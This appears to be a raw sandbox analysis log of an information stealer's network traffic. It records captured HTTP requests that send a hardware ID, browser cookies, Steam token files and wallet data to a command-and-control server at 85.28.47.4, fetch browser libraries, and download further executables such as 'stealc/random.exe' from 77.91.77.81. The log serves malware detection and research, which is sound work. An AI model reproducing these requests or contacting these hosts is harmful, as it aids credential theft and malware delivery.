00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 30 21 00 00 40 02 00 00 04 00 00 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 50 00 00 00 70 23 00 00 20 00 00 00 ec 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 30 79 00 00 c0 23 00 00 28 03 00 00 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 64 61 74 61 00 00 00 00 40 21 00 00 f0 9c 00 00 3a 21 00 00 34 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAEHCFCBKKJDGCAKFCFIHost: 85.28.47.4Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 45 48 43 46 43 42 4b 4b 4a 44 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 36 46 33 35 46 37 42 46 35 46 38 32 38 37 36 35 33 34 35 39 32 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 43 46 43 42 4b 4b 4a 44 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 43 46 43 42 4b 4b 4a 44 47 43 41 4b 46 43 46 49 2d 2d 0d 0a Data Ascii: ------CAEHCFCBKKJDGCAKFCFIContent-Disposition: form-data; name="hwid"46F35F7BF5F82876534592------CAEHCFCBKKJDGCAKFCFIContent-Disposition: form-data; name="build"default------CAEHCFCBKKJDGCAKFCFI--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKECBAKFBGDGCBGDBAECHost: 85.28.47.4Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 43 42 41 4b 46 42 47 44 47 43 42 47 44 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 36 39 34 34 38 62 32 36 66 30 61 65 34 65 31 32 39 34 34 32 66 34 65 39 36 62 30 38 37 64 35 32 66 38 37 62 35 61 34 31 33 65 61 36 33 34 66 37 39 33 32 64 31 65 33 39 61 65 65 62 37 30 32 32 64 35 39 36 31 65 34 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 42 41 4b 46 42 47 44 47 43 42 47 44 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 42 41 4b 46 42 47 44 47 43 42 47 44 42 41 45 43 2d 2d 0d 0a Data Ascii: ------BKECBAKFBGDGCBGDBAECContent-Disposition: form-data; name="token"369448b26f0ae4e129442f4e96b087d52f87b5a413ea634f7932d1e39aeeb7022d5961e4------BKECBAKFBGDGCBGDBAECContent-Disposition: form-data; name="message"browsers------BKECBAKFBGDGCBGDBAEC--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDAEGHDGDBGDGDAAFIHost: 85.28.47.4Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 36 39 34 34 38 62 32 36 66 30 61 65 34 65 31 32 39 34 34 32 66 34 65 39 36 62 30 38 37 64 35 32 66 38 37 62 35 61 34 31 33 65 61 36 33 34 66 37 39 33 32 64 31 65 33 39 61 65 65 62 37 30 32 32 64 35 39 36 31 65 34 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 2d 2d 0d 0a Data Ascii: ------AFHDAEGHDGDBGDGDAAFIContent-Disposition: form-data; name="token"369448b26f0ae4e129442f4e96b087d52f87b5a413ea634f7932d1e39aeeb7022d5961e4------AFHDAEGHDGDBGDGDAAFIContent-Disposition: form-data; name="message"plugins------AFHDAEGHDGDBGDGDAAFI--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIIEBAAFBFBAKFIDBAFHHost: 85.28.47.4Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 49 45 42 41 41 46 42 46 42 41 4b 46 49 44 42 41 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 36 39 34 34 38 62 32 36 66 30 61 65 34 65 31 32 39 34 34 32 66 34 65 39 36 62 30 38 37 64 35 32 66 38 37 62 35 61 34 31 33 65 61 36 33 34 66 37 39 33 32 64 31 65 33 39 61 65 65 62 37 30 32 32 64 35 39 36 31 65 34 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 42 41 41 46 42 46 42 41 4b 46 49 44 42 41 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 42 41 41 46 42 46 42 41 4b 46 49 44 42 41 46 48 2d 2d 0d 0a Data Ascii: ------IIIEBAAFBFBAKFIDBAFHContent-Disposition: form-data; name="token"369448b26f0ae4e129442f4e96b087d52f87b5a413ea634f7932d1e39aeeb7022d5961e4------IIIEBAAFBFBAKFIDBAFHContent-Disposition: form-data; name="message"fplugins------IIIEBAAFBFBAKFIDBAFH--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEGIJKEHCAKFCAKFHDAAHost: 85.28.47.4Content-Length: 7971Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/sqlite3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAEHCFCBKKJDGCAKFCFIHost: 85.28.47.4Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 45 48 43 46 43 42 4b 4b 4a 44 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 36 39 34 34 38 62 32 36 66 30 61 65 34 65 31 32 39 34 34 32 66 34 65 39 36 62 30 38 37 64 35 32 66 38 37 62 35 61 34 31 33 65 61 36 33 34 66 37 39 33 32 64 31 65 33 39 61 65 65 62 37 30 32 32 64 35 39 36 31 65 34 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 43 46 43 42 4b 4b 4a 44 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 43 46 43 42 4b 4b 4a 44 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4e 7a 59 31 4e 44 45 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 55 74 4d 44 63 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 31 4e 7a 51 77 43 55 35 4a 52 41 6b 31 4d 54 45 39 62 6b 35 68 5a 48 46 58 4f 58 56 55 59 31 6b 77 54 31 41 32 53 54 4e 68 5a 6d 35 79 4e 7a 46 76 4e 6b 56 36 59 56 6c 4d 63 32 52 77 56 7a 52 56 52 56 6c 4f 4d 33 5a 5a 63 56 39 79 59 6c 4a 79 54 6b 5a 34 54 54 46 71 62 33 70 51 52 33 56 6f 61 6b 39 53 51 6c 70 4c 53 30 31 36 4d 6e 52 6b 52 48 42 57 5a 54 64 6b 54 6e 56 55 56 33 41 30 51 33 6c 4c 4c 58 70 30 4e 55 6c 7a 4e 6e 64 57 52 57 78 32 5a 56 64 42 5a 6b 74 52 5a 33 64 4f 53 6d 6c 4c 53 33 52 59 53 45 4e 44 51 32 31 79 62 47 64 36 57 6c 52 73 4e 55 4e 70 53 32 70 55 5a 55 45 79 61 56 46 78 5a 6a 5a 36 62 46 4a 4c 4d 6d 67 34 64 32 63 78 61 46 5a 77 53 58 4e 58 63 32 46 4c 63 57 46 58 53 6e 6c 49 54 56 42 47 4d 30 70 42 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 43 46 43 42 4b 4b 4a 44 47 43 41 4b 46 43 46 49 2d 2d 0d 0a Data Ascii: ------CAEHCFCBKKJDGCAKFCFIContent-Disposition: form-data; name="token"369448b26f0ae4e129442f4e96b087d52f87b5a413ea634f7932d1e39aeeb7022d5961e4------CAEHCFCBKKJDGCAKFCFIContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------CAEHCFCBKKJDGCAKFCFIContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwNzY1NDEJMVBfSkFSCTIwMjMtMTAtMDUtMDcKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjk1NzQwCU5JRAk1MTE9bk5hZHFXOXVUY1kwT1A2STNhZm5yNzFvNkV6YVlMc
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCFIJEBFCGDAAKFHIDBFHost: 85.28.47.4Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 46 49 4a 45 42 46 43 47 44 41 41 4b 46 48 49 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 36 39 34 34 38 62 32 36 66 30 61 65 34 65 31 32 39 34 34 32 66 34 65 39 36 62 30 38 37 64 35 32 66 38 37 62 35 61 34 31 33 65 61 36 33 34 66 37 39 33 32 64 31 65 33 39 61 65 65 62 37 30 32 32 64 35 39 36 31 65 34 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 49 4a 45 42 46 43 47 44 41 41 4b 46 48 49 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 49 4a 45 42 46 43 47 44 41 41 4b 46 48 49 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 49 4a 45 42 46 43 47 44 41 41 4b 46 48 49 44 42 46 2d 2d 0d 0a Data Ascii: ------FCFIJEBFCGDAAKFHIDBFContent-Disposition: form-data; name="token"369448b26f0ae4e129442f4e96b087d52f87b5a413ea634f7932d1e39aeeb7022d5961e4------FCFIJEBFCGDAAKFHIDBFContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------FCFIJEBFCGDAAKFHIDBFContent-Disposition: form-data; name="file"------FCFIJEBFCGDAAKFHIDBF--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDAAKEGDBFIJJKFHCFBHost: 85.28.47.4Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 44 41 41 4b 45 47 44 42 46 49 4a 4a 4b 46 48 43 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 36 39 34 34 38 62 32 36 66 30 61 65 34 65 31 32 39 34 34 32 66 34 65 39 36 62 30 38 37 64 35 32 66 38 37 62 35 61 34 31 33 65 61 36 33 34 66 37 39 33 32 64 31 65 33 39 61 65 65 62 37 30 32 32 64 35 39 36 31 65 34 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 41 4b 45 47 44 42 46 49 4a 4a 4b 46 48 43 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 41 4b 45 47 44 42 46 49 4a 4a 4b 46 48 43 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 41 4b 45 47 44 42 46 49 4a 4a 4b 46 48 43 46 42 2d 2d 0d 0a Data Ascii: ------HIDAAKEGDBFIJJKFHCFBContent-Disposition: form-data; name="token"369448b26f0ae4e129442f4e96b087d52f87b5a413ea634f7932d1e39aeeb7022d5961e4------HIDAAKEGDBFIJJKFHCFBContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------HIDAAKEGDBFIJJKFHCFBContent-Disposition: form-data; name="file"------HIDAAKEGDBFIJJKFHCFB--
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/freebl3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/mozglue.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/msvcp140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/nss3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/softokn3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/vcruntime140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEBAFCBKFIDGCAKKKFCHost: 85.28.47.4Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHJJECBKKECFIEBGCAKHost: 85.28.47.4Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 48 4a 4a 45 43 42 4b 4b 45 43 46 49 45 42 47 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 36 39 34 34 38 62 32 36 66 30 61 65 34 65 31 32 39 34 34 32 66 34 65 39 36 62 30 38 37 64 35 32 66 38 37 62 35 61 34 31 33 65 61 36 33 34 66 37 39 33 32 64 31 65 33 39 61 65 65 62 37 30 32 32 64 35 39 36 31 65 34 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 4a 4a 45 43 42 4b 4b 45 43 46 49 45 42 47 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 4a 4a 45 43 42 4b 4b 45 43 46 49 45 42 47 43 41 4b 2d 2d 0d 0a Data Ascii: ------IEHJJECBKKECFIEBGCAKContent-Disposition: form-data; name="token"369448b26f0ae4e129442f4e96b087d52f87b5a413ea634f7932d1e39aeeb7022d5961e4------IEHJJECBKKECFIEBGCAKContent-Disposition: form-data; name="message"wallets------IEHJJECBKKECFIEBGCAK--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCBFBGDBKJKECAAKKFHDHost: 85.28.47.4Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 36 39 34 34 38 62 32 36 66 30 61 65 34 65 31 32 39 34 34 32 66 34 65 39 36 62 30 38 37 64 35 32 66 38 37 62 35 61 34 31 33 65 61 36 33 34 66 37 39 33 32 64 31 65 33 39 61 65 65 62 37 30 32 32 64 35 39 36 31 65 34 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 2d 2d 0d 0a Data Ascii: ------FCBFBGDBKJKECAAKKFHDContent-Disposition: form-data; name="token"369448b26f0ae4e129442f4e96b087d52f87b5a413ea634f7932d1e39aeeb7022d5961e4------FCBFBGDBKJKECAAKKFHDContent-Disposition: form-data; name="message"files------FCBFBGDBKJKECAAKKFHD--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBGHDGHCGHCAAKFIIECFHost: 85.28.47.4Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 36 39 34 34 38 62 32 36 66 30 61 65 34 65 31 32 39 34 34 32 66 34 65 39 36 62 30 38 37 64 35 32 66 38 37 62 35 61 34 31 33 65 61 36 33 34 66 37 39 33 32 64 31 65 33 39 61 65 65 62 37 30 32 32 64 35 39 36 31 65 34 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 46 2d 2d 0d 0a Data Ascii: ------DBGHDGHCGHCAAKFIIECFContent-Disposition: form-data; name="token"369448b26f0ae4e129442f4e96b087d52f87b5a413ea634f7932d1e39aeeb7022d5961e4------DBGHDGHCGHCAAKFIIECFContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------DBGHDGHCGHCAAKFIIECFContent-Disposition: form-data; name="file"------DBGHDGHCGHCAAKFIIECF--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGDGCFBAEGDHJKEBGCBAHost: 85.28.47.4Content-Length: 270Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 44 47 43 46 42 41 45 47 44 48 4a 4b 45 42 47 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 36 39 34 34 38 62 32 36 66 30 61 65 34 65 31 32 39 34 34 32 66 34 65 39 36 62 30 38 37 64 35 32 66 38 37 62 35 61 34 31 33 65 61 36 33 34 66 37 39 33 32 64 31 65 33 39 61 65 65 62 37 30 32 32 64 35 39 36 31 65 34 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 47 43 46 42 41 45 47 44 48 4a 4b 45 42 47 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 47 43 46 42 41 45 47 44 48 4a 4b 45 42 47 43 42 41 2d 2d 0d 0a Data Ascii: ------CGDGCFBAEGDHJKEBGCBAContent-Disposition: form-data; name="token"369448b26f0ae4e129442f4e96b087d52f87b5a413ea634f7932d1e39aeeb7022d5961e4------CGDGCFBAEGDHJKEBGCBAContent-Disposition: form-data; name="message"jbdtaijovg------CGDGCFBAEGDHJKEBGCBA--
Source: global traffic HTTP traffic detected: GET /mine/amadka.exe HTTP/1.1Host: 77.91.77.81Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 37 32 36 37 32 42 32 35 44 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A76B72672B25D82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 77.91.77.81
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCGIJKJJKEBGHJKFIDGCHost: 85.28.47.4Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 36 46 33 35 46 37 42 46 35 46 38 32 38 37 36 35 33 34 35 39 32 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 2d 2d 0d 0a Data Ascii: ------FCGIJKJJKEBGHJKFIDGCContent-Disposition: form-data; name="hwid"46F35F7BF5F82876534592------FCGIJKJJKEBGHJKFIDGCContent-Disposition: form-data; name="build"default------FCGIJKJJKEBGHJKFIDGC--
